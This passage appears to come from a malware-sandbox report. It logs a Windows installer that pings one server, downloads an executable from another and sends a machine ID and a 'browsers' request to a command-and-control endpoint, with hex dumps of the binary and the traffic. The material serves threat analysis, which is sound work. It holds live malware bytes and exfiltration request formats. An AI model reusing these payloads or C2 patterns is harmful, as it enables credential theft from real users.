                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:41.942962885 CET1286INData Raw: 6d b8 76 bf 4f 79 f7 64 24 28 8b 44 24 28 81 44 24 30 9a 95 06 17 81 6c 24 1c 89 ba 28 1a 81 6c 24 30 cb c9 65 45 81 6c 24 54 13 da 59 7a b8 36 0a 4d 01 f7 64 24 34 8b 44 24 34 81 6c 24 54 81 6e 99 2e 81 44 24 24 5b 20 f0 75 b8 b8 df e7 34 f7 64
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: mvOyd$(D$(D$0l$(l$0eEl$TYz6Md$4D$4l$Tn.D$$[ u4d$LD$LD$<l$43D$4<2nTpd$D$D$,!;^D$PrD$HG~l$0\%Kl$@!*D$3=4CSSSSBj^t$t\$p\$`$QQ$X
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:41.942998886 CET1286INData Raw: f2 42 00 b8 01 00 00 00 83 3d 30 45 43 00 00 0f 85 27 23 00 00 ba 12 00 00 00 8d 0d 10 f0 42 00 e8 20 24 00 00 5a c3 cc cc cc cc cc cc cc 83 3d 44 15 44 00 00 0f 84 f6 26 00 00 83 ec 08 0f ae 5c 24 04 8b 44 24 04 25 80 1f 00 00 3d 80 1f 00 00 75
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: B=0EC'#B $Z=DD&\$D$%=u<$f$ffd$&~D$f(Bf(f(fs4f~fT0BfftL=|}f=2fL$D$f.{$T$T$T$$#D$~
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:41.943031073 CET212INData Raw: 00 00 b8 94 91 42 00 c7 04 24 98 91 42 00 e8 63 ff ff ff 83 3d 60 15 44 00 00 59 74 1b 68 60 15 44 00 e8 31 39 00 00 59 85 c0 74 0c 6a 00 6a 02 6a 00 ff 15 60 15 44 00 33 c0 5d c3 6a 18 68 50 dd 42 00 e8 d0 39 00 00 6a 08 e8 91 36 00 00 59 83 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: B$Bc=`DYth`D19Ytjjj`D3]jhPB9j6Ye3C9ACACEAC}5XD/Y}tx5TD/Yu}uu;rW/9t;rJ6}/m/5X
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:41.943067074 CET1286INData Raw: 44 00 e8 67 2f 00 00 8b f8 ff 35 54 15 44 00 e8 5a 2f 00 00 83 c4 0c 39 7d e4 75 05 39 45 e0 74 0e 89 7d e4 89 7d d8 89 45 e0 8b f0 89 75 dc 8b 7d d8 eb 9f 68 d0 91 42 00 b8 c4 91 42 00 e8 5f fe ff ff 59 68 d8 91 42 00 b8 d4 91 42 00 e8 4f fe ff
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: Dg/5TDZ/9}u9Et}}Eu}hBB_YhBBOYE}u(ACj4Yu3C}tj4Y8Ujju]Ujju]jjjjjjV.V<VP<
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:41.943104029 CET1286INData Raw: 08 83 fb 0b 7f 4c 74 15 8b c3 6a 02 59 2b c1 74 22 2b c1 74 08 2b c1 74 64 2b c1 75 44 e8 19 2c 00 00 8b f8 89 7d d8 85 ff 75 14 83 c8 ff e9 61 01 00 00 be 00 42 43 00 a1 00 42 43 00 eb 60 ff 77 5c 8b d3 e8 5d ff ff ff 8b f0 83 c6 08 8b 06 eb 5a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: LtjY+t"+t+td+uD,}uaBCBC`w\]Zt<t+Ht3PPPPPuBCBCBCBCBCBCEP)EY3}9Euj9EtP30Y3EttuO`MG`
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:41.943852901 CET1286INData Raw: 27 00 00 89 46 08 8b 48 6c 89 0e 8b 48 68 89 4e 04 8b 0e 3b 0d 78 fd 42 00 74 12 8b 0d 94 fc 42 00 85 48 70 75 07 e8 e4 58 00 00 89 06 8b 46 04 3b 05 98 fb 42 00 74 16 8b 46 08 8b 0d 94 fc 42 00 85 48 70 75 08 e8 58 51 00 00 89 46 04 8b 46 08 f6
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 'FHlHhN;xBtBHpuXF;BtFBHpuXQFF@puHpF@F^]A@tyt$IxQPYYuUVMEM>t}^]UG@SVt2u,E+M}
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:41.943891048 CET1286INData Raw: 00 83 f8 53 0f 8f f2 00 00 00 0f 84 80 00 00 00 83 e8 41 74 10 48 48 74 58 48 48 74 08 48 48 0f 85 92 05 00 00 80 c2 20 c7 85 90 fd ff ff 01 00 00 00 88 95 ef fd ff ff 83 8d f0 fd ff ff 40 39 b5 e8 fd ff ff 8d 9d f4 fd ff ff b8 00 02 00 00 89 9d
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: SAtHHtXHHtHH @9H00uu;uB
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:41.943928957 CET1286INData Raw: 4f 00 00 83 c4 10 85 c0 75 28 39 85 98 fd ff ff 74 20 ff b5 98 fd ff ff 8d 85 d8 fd ff ff 8d 4d f4 e8 f1 f4 ff ff 83 bd a0 fd ff ff 00 59 75 b5 eb 1c 83 8d d8 fd ff ff ff eb 13 8b 8d e4 fd ff ff 50 8d 85 d8 fd ff ff e8 ca f4 ff ff 59 83 bd d8 fd
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: Ou(9t MYuPY|tWSj tnYtt`pM_^3[#/@$-@T-@-@-@.@


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                4192.168.2.649726185.172.128.90804632C:\Users\user\AppData\Local\Temp\InstallSetup4.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:41.673847914 CET152OUTGET /cpa/ping.php?substr=four&s=ab HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                User-Agent: NSIS_Inetc (Mozilla)
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.90
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:42.488270044 CET204INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:12:41 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1
                                                                                                                                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                5192.168.2.649728185.172.128.127804632C:\Users\user\AppData\Local\Temp\InstallSetup4.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:43.944772005 CET135OUTGET /syncUpd.exe HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                User-Agent: NSIS_Inetc (Mozilla)
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.127
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:44.148356915 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:12:44 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Mon, 05 Feb 2024 11:00:02 GMT
                                                                                                                                                                                                                                                                                                                                                                ETag: "50000-610a05d0c651d"
                                                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 327680
                                                                                                                                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 a7 57 0d 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 a6 02 00 00 48 03 00 00 00 00 00 7f 24 00 00 00 10 00 00 00 c0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 70 24 00 00 04 00 00 e1 e1 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 cc 12 03 00 64 00 00 00 00 50 04 00 78 a4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 c1 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0b 03 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 02 00 94 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 06 a4 02 00 00 10 00 00 00 a6 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0a 5c 00 00 00 c0 02 00 00 5e 00 00 00 aa 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 64 25 01 00 00 20 03 00 00 52 00 00 00 08 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 14 20 00 00 50 04 00 00 a6 01 00 00 5a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELWdH$@p$dPx@.text `.rdata\^@@.datad% R@.rsrcx PZ@@
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:44.148401976 CET1286INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6a 6c 58 6a 6d 66 a3 4a 29 44 00 58 6a 67 66 a3 3e 29 44 00 58 6a 64 66 a3 40 29 44 00 58 6a 6c 66 a3 48 29
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: jlXjmfJ)DXjgf>)DXjdf@)DXjlfH)D3fN)DXj.fL)DXj2fF)DXjmfD)DXjif8)DXj3f<)DXjsfB)DXh8)Df:)D$B4U<ESXV0W3=4)DuuWPW4B5CE5CEE
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:44.148437977 CET1286INData Raw: 24 20 d5 b2 90 7f c7 44 24 48 86 5c 31 03 c7 44 24 2c 68 82 32 3b c7 44 24 44 fa 05 9b 5c c7 44 24 3c 2d c3 af 4c c7 44 24 40 2b 93 87 6f c7 44 24 38 00 c8 e5 0e c7 44 24 14 61 2a 78 12 c7 44 24 50 58 1e ba 50 c7 44 24 10 83 a8 61 4d 81 44 24 1c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: $ D$H\1D$,h2;D$D\D$<-LD$@+oD$8D$a*xD$PXPD$aMD$hu0i[d$D$2i<d$4D$4D$TD$x:ed$D$l$<D$4:fD$4Pvl$Lb*Fl$D$Dl$$YmvOyd$(D$(D$0l$(l$0eEl$TYz
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:44.148477077 CET1286INData Raw: 00 90 83 3d 44 45 44 00 00 74 32 83 ec 08 0f ae 5c 24 04 8b 44 24 04 25 80 1f 00 00 3d 80 1f 00 00 75 0f d9 3c 24 66 8b 04 24 66 83 e0 7f 66 83 f8 7f 8d 64 24 08 75 05 e9 25 1f 00 00 83 ec 0c dd 14 24 e8 a2 23 00 00 e8 0d 00 00 00 83 c4 0c c3 8d
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: =DEDt2\$D$%=u<$f$ffd$u%$#T$M#R<$tPf<$t-xBz=0uC|# Cy#-zBz"u|$u-"C=0uC'# C $Z
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:44.148514032 CET1286INData Raw: 15 48 c0 42 00 85 c0 74 05 ff 75 08 ff d0 5d c3 8b ff 55 8b ec ff 75 08 e8 c8 ff ff ff 59 ff 75 08 ff 15 a8 c0 42 00 cc 6a 08 e8 75 37 00 00 59 c3 6a 08 e8 92 36 00 00 59 c3 8b ff 55 8b ec 56 8b f0 eb 0b 8b 06 85 c0 74 02 ff d0 83 c6 04 3b 75 08
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: HBtu]UuYuBju7Yj6YUVt;ur^]UVu3ut;ur^]U=`Bth`B9Ytu`BY8hBhBYYuBhX@88B$Bc=`EDYth`ED19Ytjj
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:44.148550034 CET1286INData Raw: c6 74 07 50 e8 ad fa ff ff 59 e8 8f 3c 00 00 84 5d c4 74 06 0f b7 4d c8 eb 03 6a 0a 59 51 50 56 68 00 00 40 00 e8 61 f0 ff ff 89 45 e0 39 75 e4 75 06 50 e8 ee fc ff ff e8 15 fd ff ff 89 7d fc eb 35 8b 45 ec 8b 08 8b 09 89 4d dc 50 51 e8 05 38 00
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: tPY<]tMjYQPVh@aE9uuP}5EMPQ8YYeEE}uPEE3@eE5ByT$L$ti3D$ur=HEDtBWr1t+u
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:44.148586988 CET1286INData Raw: fe ff ff 68 ff 00 00 00 e8 1f fe ff ff 59 59 c3 3b 0d f8 20 43 00 75 02 f3 c3 e9 af 43 00 00 8b ff 55 8b ec 51 56 8b 75 0c 56 e8 b4 50 00 00 89 45 0c 8b 46 0c 59 a8 82 75 17 e8 a8 0f 00 00 c7 00 09 00 00 00 83 4e 0c 20 83 c8 ff e9 2f 01 00 00 a8
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: hYY; CuCUQVuVPEFYuN /@t"S3t^NFFF^]u,N ;tN@;uuNYuVMYFWF>HN+I;N~WPuL
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:44.148622990 CET1286INData Raw: fd ff ff e9 cc 08 00 00 89 b5 e8 fd ff ff e9 c1 08 00 00 80 fa 2a 75 26 83 c7 04 89 bd dc fd ff ff 8b 7f fc 3b fe 89 bd e8 fd ff ff 0f 8d a2 08 00 00 83 8d e8 fd ff ff ff e9 96 08 00 00 8b 85 e8 fd ff ff 6b c0 0a 0f be ca 8d 44 08 d0 89 85 e8 fd
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: *u&;kD{ItUhtDltwcT;luC9- !<6u{4uCC<3u{2uCC
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:44.148662090 CET1286INData Raw: 80 00 00 00 74 20 39 b5 e8 fd ff ff 75 18 8d 85 a4 fd ff ff 50 53 ff 35 8c 24 43 00 e8 cd 1c 00 00 59 ff d0 59 59 80 bd ef fd ff ff 67 75 1c 3b fe 75 18 8d 85 a4 fd ff ff 50 53 ff 35 88 24 43 00 e8 a8 1c 00 00 59 ff d0 59 59 80 3b 2d 75 11 81 8d
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: t 9uPS5$CYYYgu;uPS5$CYYY;-uCS$sHH'iQ0EK t
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:44.148698092 CET1286INData Raw: fc 89 8d e4 fd ff ff c7 85 d8 fc ff ff 17 04 00 c0 c7 85 dc fc ff ff 01 00 00 00 89 85 e4 fc ff ff ff 15 c4 c0 42 00 6a 00 8b d8 ff 15 a0 c0 42 00 8d 85 28 fd ff ff 50 ff 15 9c c0 42 00 85 c0 75 0c 85 db 75 08 6a 02 e8 46 4e 00 00 59 68 17 04 00
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: BjB(PBuujFNYhBPBM3[U5,uCkYt]jNY]UE3;!CtA-rHwjX]!C]DjY;#]up"Cut
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:44.351913929 CET1286INData Raw: 88 24 43 00 cf 87 40 00 c7 05 8c 24 43 00 5c 87 40 00 c3 8b ff 55 8b ec e8 96 ff ff ff e8 76 55 00 00 83 7d 08 00 a3 34 75 43 00 74 05 e8 fd 54 00 00 db e2 5d c3 cc cc d9 c0 d9 fc dc e1 d9 c9 d9 e0 d9 f0 d9 e8 de c1 d9 fd dd d9 c3 8b 54 24 04 81
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: $C@$C\@UvU}4uCtT]T$fT$l$tpBB%=tBD$BD$$,$BD$%=tD$f<$t,$Zf$f=tf t


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                6192.168.2.649732185.172.128.79805176C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:47.574539900 CET414OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----HDBGDHDAECBGDHJKFIDG
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 213
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 2d 2d 2d 2d 2d 2d 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 39 35 41 38 44 45 33 32 43 37 30 33 33 30 30 34 35 32 34 30 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 47 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ------HDBGDHDAECBGDHJKFIDGContent-Disposition: form-data; name="hwid"995A8DE32C70330045240------HDBGDHDAECBGDHJKFIDGContent-Disposition: form-data; name="build"default------HDBGDHDAECBGDHJKFIDG--
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:47.927285910 CET351INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:12:47 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 156
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 4e 32 59 31 4f 57 59 32 5a 44 45 35 4e 54 42 6a 5a 54 4d 78 5a 57 55 30 4e 6d 56 6d 5a 6a 68 6d 4e 57 5a 6c 59 57 45 78 4d 44 5a 69 4d 7a 4d 79 4f 57 51 32 59 6a 63 79 4d 54 42 69 4d 32 4a 6b 59 54 6c 6a 4e 7a 59 34 4d 54 49 35 4e 6a 55 32 4f 54 56 69 4e 6d 45 35 4e 32 59 35 5a 47 49 7a 66 47 70 69 5a 48 52 68 61 57 70 76 64 6d 64 38 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 66 44 46 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 3d
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: N2Y1OWY2ZDE5NTBjZTMxZWU0NmVmZjhmNWZlYWExMDZiMzMyOWQ2YjcyMTBiM2JkYTljNzY4MTI5NjU2OTViNmE5N2Y5ZGIzfGpiZHRhaWpvdmd8ZWltZWhydnpvZC5maWxlfDF8MHwxfDF8MXwxfDF8MXw=
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:48.049825907 CET469OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----FBFHJJJDAFBKEBGDGHCG
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 268
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 2d 2d 2d 2d 2d 2d 46 42 46 48 4a 4a 4a 44 41 46 42 4b 45 42 47 44 47 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 66 35 39 66 36 64 31 39 35 30 63 65 33 31 65 65 34 36 65 66 66 38 66 35 66 65 61 61 31 30 36 62 33 33 32 39 64 36 62 37 32 31 30 62 33 62 64 61 39 63 37 36 38 31 32 39 36 35 36 39 35 62 36 61 39 37 66 39 64 62 33 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 48 4a 4a 4a 44 41 46 42 4b 45 42 47 44 47 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 48 4a 4a 4a 44 41 46 42 4b 45 42 47 44 47 48 43 47 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ------FBFHJJJDAFBKEBGDGHCGContent-Disposition: form-data; name="token"7f59f6d1950ce31ee46eff8f5feaa106b3329d6b7210b3bda9c76812965695b6a97f9db3------FBFHJJJDAFBKEBGDGHCGContent-Disposition: form-data; name="message"browsers------FBFHJJJDAFBKEBGDGHCG--
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:48.374389887 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:12:48 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1520
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 64 6d 6c 32 59 57 78 6b 61 53 35 6c 65 47 56 38 51 32 39 74 62 32 52 76 49 45 52 79 59 57 64 76 62 6e 78 63 51 32 39 74 62 32 52 76 58 45 52 79 59 57 64 76 62 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 52 58 42 70 59 31 42 79 61 58 5a 68 59 33 6c 43 63 6d 39 33 63 32 56 79 66 46 78 46 63 47 6c 6a 49 46 42 79 61 58 5a 68 59 33 6b 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 32 39 6a 51 32 39 6a 66 46 78 44 62 32 4e 44 62 32 4e 63 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 6e 4a 68 64 6d 56 38 58 45 4a 79 59 58 5a 6c 55 32 39 6d 64 48 64 68 63 6d 56 63 51 6e 4a 68 64 6d 55 74 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4a 79 59 58 5a 6c 4c 6d 56 34 5a 58 78 44 5a 57 35 30 49 45 4a 79 62 33 64 7a 5a 58 4a 38 58 45 4e 6c 62 6e 52 43 63 6d 39 33 63 32 56 79 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 77 33 55 33 52 68 63 6e 78 63 4e 31 4e 30 59 58 4a 63 4e 31 4e 30 59 58 4a 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 77 66 45 4e 6f 